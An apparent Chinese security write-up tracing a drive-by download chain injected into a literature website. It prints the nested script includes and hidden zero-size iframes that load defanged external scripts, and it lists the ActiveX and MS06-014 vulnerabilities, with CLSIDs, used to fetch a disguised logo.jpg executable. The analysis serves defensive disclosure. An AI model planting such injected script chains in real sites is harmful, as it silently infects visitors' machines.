某文学网站上挂的logo.jpg /logo.exe 更新了

简介: 某文学网站上挂的logo.jpg /logo.exe 更新了

网站首页 包含代码:

/---

<script src="ads/iw_t.js"></script>

---/

#1 ads/iw_t.js包含代码:

/---

<script src='/images/jin.gif'></script>

---/

#1.1 /images/jin.gif

输出代码:

/---

<script language="javascript" src="hxxp://w**w*.shi*t**ip.com/file/my.js"></script>

---/

#1.1.1 hxxp://w**w*.shi*t**ip.com/file/my.js 输出代码:

/---

<script language='javascript' src='hxxp://a**d.shi*t**ip.com/file/ad.js'></script>

---/

#1.1.1.1 hxxp://a**d.shi*t**ip.com/file/ad.js 输出代码:

/---

<iframe name='logo_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/logo.js'></script>

<iframe name='real2_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/real2.js'></script>

<iframe name='real_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/real.js'></script>

<iframe name='lz3_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/lz3.js'></script>

<iframe name='lz2_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/lz2.js'></script>

<iframe name='lz_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/lz.js'></script>

<iframe name='bf_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/bf.js'></script>

<iframe name='pps_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/pps.js'></script>

<iframe name='xunlei_if' width='25' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/xunlei.js'></script>

<iframe name='sdr_if' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://w**w*.shi*t**ip.com/file/sdr.js'></script>

<iframe name='cif_' width='0' height='0'></iframe>

<script language='javascript' src='hxxp://count23.51yes.com/click.aspx?id=238288070&logo=1'></script>

---/

#1.1.1.1.1 hxxp://w**w*.shi*t**ip.com/file/logo.js

利用 MS06-014漏洞下载 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg


#1.1.1.1.2 hxxp://w**w*.shi*t**ip.com/file/real2.js

利用 RealPlayer(rmocx.RealPlayer RAM Download Handler.1,clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93)漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.3 hxxp://w**w*.shi*t**ip.com/file/real.js

利用 RealPlayer(IERPCtl.IERPCtl.1)漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.4 hxxp://w**w*.shi*t**ip.com/file/lz3.js

利用 联众(HanGamePluginCn18.HanGamePluginCn18.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.5 hxxp://w**w*.shi*t**ip.com/file/lz2.js

利用 联众(GLIEDown.IEDown.1,clsid:F917534D-535B-416B-8E8F-0C04756C31A8)漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.6 hxxp://w**w*.shi*t**ip.com/file/lz.js

利用 联众(GLCHAT.GLChatCtrl.1,clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69)漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.7 hxxp://w**w*.shi*t**ip.com/file/bf.js

利用 暴风影音(MPS.StormPlayer,clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.8 hxxp://w**w*.shi*t**ip.com/file/pps.js

利用 PPStream(POWERPLAYER.PowerPlayerCtrl.1,clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458)漏洞 下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.9 hxxp://w**w*.shi*t**ip.com/file/xunlei.js

利用迅雷(PPlayer.XPPlayer.1,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg

#1.1.1.1.10 hxxp://w**w*.shi*t**ip.com/file/sdr.js

利用超星阅览器(Pdg2,clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2)漏洞下载 hxxp://w**w*.shi*t**ip.com/file/images/logo.jpg


相关文章
|
2天前
|
存储 JavaScript 前端开发
JavaScript基础
本节讲解JavaScript基础核心知识:涵盖值类型与引用类型区别、typeof检测类型及局限性、===与==差异及应用场景、内置函数与对象、原型链五规则、属性查找机制、instanceof原理,以及this指向和箭头函数中this的绑定时机。重点突出类型判断、原型继承与this机制,助力深入理解JS面向对象机制。(238字)
|
3天前
|
安全 数据可视化 网络安全
安全无小事|阿里云先知众测,为企业筑牢防线
专为企业打造的漏洞信息收集平台
1303 2
|
4天前
|
云安全 人工智能
2025,阿里云安全的“年度报告”
拥抱AI时代,阿里云安全为你护航~
1451 2
|
2天前
|
人工智能 自然语言处理 API
n8n:流程自动化、智能化利器
流程自动化助你在重复的业务流程中节省时间,可通过自然语言直接创建工作流啦。
355 4
n8n:流程自动化、智能化利器
|
11天前
|
机器学习/深度学习 安全 API
MAI-UI 开源:通用 GUI 智能体基座登顶 SOTA!
MAI-UI是通义实验室推出的全尺寸GUI智能体基座模型,原生集成用户交互、MCP工具调用与端云协同能力。支持跨App操作、模糊语义理解与主动提问澄清,通过大规模在线强化学习实现复杂任务自动化,在出行、办公等高频场景中表现卓越,已登顶ScreenSpot-Pro、MobileWorld等多项SOTA评测。
1460 7
|
1天前
|
Linux 数据库
Linux 环境 Polardb-X 数据库 单机版 rpm 包 安装教程
本文介绍在CentOS 7.9环境下安装PolarDB-X单机版数据库的完整流程,涵盖系统环境准备、本地Yum源配置、RPM包安装、用户与目录初始化、依赖库解决、数据库启动及客户端连接等步骤,助您快速部署运行PolarDB-X。
223 1
Linux 环境 Polardb-X 数据库 单机版 rpm 包 安装教程
|
4天前
|
人工智能 API 开发工具
Skills比MCP更重要?更省钱的多!Python大佬这观点老金测了一周终于懂了
加我进AI学习群,公众号右下角“联系方式”。文末有老金开源知识库·全免费。本文详解Claude Skills为何比MCP更轻量高效:极简配置、按需加载、省90% token,适合多数场景。MCP仍适用于复杂集成,但日常任务首选Skills。推荐先用SKILL.md解决,再考虑协议。附实测对比与配置建议,助你提升效率,节省精力。关注老金,一起玩转AI工具。
|
12天前
|
人工智能 Rust 运维
这个神器让你白嫖ClaudeOpus 4.5,Gemini 3!还能接Claude Code等任意平台
加我进AI讨论学习群,公众号右下角“联系方式”文末有老金的 开源知识库地址·全免费
1330 16
|
4天前
|
机器学习/深度学习 测试技术 数据中心
九坤量化开源IQuest-Coder-V1,代码大模型进入“流式”训练时代
2026年首日,九坤创始团队成立的至知创新研究院开源IQuest-Coder-V1系列代码大模型,涵盖7B至40B参数,支持128K上下文与GQA架构,提供Base、Instruct、Thinking及Loop版本。采用创新Code-Flow训练范式,模拟代码演化全过程,提升复杂任务推理能力,在SWE-Bench、LiveCodeBench等基准领先。全阶段checkpoint开放,支持本地部署与微调,助力研究与应用落地。
432 1
|
3天前
|
安全 API 开发者
手把手带你使用无影 AgentBay + AgentScope 完成一站式智能体开发部署
阿里云无影 AgentBay 作为一个面向 AI 智能体开发的云端 GUI 沙箱服务,已集成至阿里巴巴通义实验室开源的 AgentScope 框架,助力开发者快速构建安全、高效的智能体应用。
252 1